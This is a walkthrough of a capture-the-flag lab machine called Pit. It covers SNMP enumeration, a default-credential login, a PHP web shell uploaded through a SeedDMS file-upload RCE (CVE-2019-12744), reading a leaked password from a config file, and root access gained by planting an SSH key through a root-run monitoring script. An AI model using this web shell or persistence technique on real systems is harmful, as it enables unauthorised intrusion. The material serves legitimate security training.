Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13 22:00 IST
Nmap scan report for 10.10.10.241
Host is up (0.13s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
|_http-server-header: nginx/1.14.1
9090/tcp open  ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
Copy

PORT    STATE SERVICE
161/udp open  snmp
| snmp-processes: 
|   1: 
|   2: 
|   3: 
|   4: 
|_  5: 
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 4ca7e41263c5985e00000000
|   snmpEngineBoots: 76
|_  snmpEngineTime: 37s
| snmp-sysdescr: Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
|_  System uptime: 37.94s (3794 timeticks)
Copy

snmpwalk -v2c -c public 10.10.10.241 . | tee snmpwalk.out   
Copy

Looks like it is executing /usr/bin/monitoring output can be seen below

Also I found a directory /var/www/html/seeddms51x/seeddms

I did not found seeddms when I tried to find the url with the ip http://10.10.10.241/seeddms51x/seeddms

Took a look at port 9090 certificate

Added it to /etc/hosts

In the snmp Output I also found a username michelle

I ll try a default password username/username

michelle:michelle worked.

Did a searchsploit against seeddms

The RCE sticks out but we have a newer version. 5.1.15

Downloaded the changelog

They added a .htaccess, this won't work because the server is running nginx and not apache adding .htaccess won't do anything.

I ll exploit the rce vulnerability.
https://bryanleong98.medium.com/cve-2019-12744-remote-command-execution-through-unvalidated-file-upload-in-seeddms-versions-5-1-1-5c32d90fda28

I need to add a document in the document I can add a php backdoor.

I can add document here -> http://dms-pit.htb/seeddms51x/seeddms/out/out.AddDocument.php?folderid=8&showtree=1

Added this as document.

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>
Copy

Add document.

The backdoor can be located but first we need to know the document id ->

When hovering your mouse over the file name we can see the document id. mine is 29

Change your document id in the below url.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id

I tried to get a reverse shell but I was not able to, some kind of firewall maybe so I used what I had to get some credentials.

There is a conf directory.

Which has a settings.xml

Did not find credentials in settings.xml

Enumerating more there was another conf directory in one more ../
../../../conf/settings.xml

I ll check for password reuse.
On port 9090 It worked with michelle:ied^ieY6xoquu

I have a web terminal

I remember previously when I ran snmp scan it was executing /usr/bin/monitor

It is executing anything that starts with a check and ends with sh in /usr/local/monitoring.
At first I was stuck that there were no write permissions in /usr/local/monitoring but using gefacl gave a clear picture.

[michelle@pit ~]$ ls -la /usr/local/ | grep monitoring
drwxrwx---+  2 root root 101 Feb 14 12:30 monitoring
Copy

because of the + symbol in the permissions I used getfacl. which means there’s additional ACLs set on the directory.

[michelle@pit ~]$ getfacl /usr/local/monitoring
getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
Copy

michael can write and execute, but can't read, that is why when I tried to read anything I got an error.

Now I ll use the snmpwalk again and hope my commands get executed and i see hello in output

snmpwalk -v2c -c public 10.10.10.241 NET-SNMP-EXTEND-MIB::nsExtendObjects 
Copy

I tried using a reverse shell but it did not work, firewall, so i inserted ssh keys to target

echo 'echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKcfMwIbRY6rYQ2lRnLmzzJKA5HAYC1xuyTpxCQbJ+o0 > /root/.ssh/authorized_keys' > check_hello.sh
Copy

Running the snmpwalk command ssh key was written to /root/.ssh/authorized_keys.

Root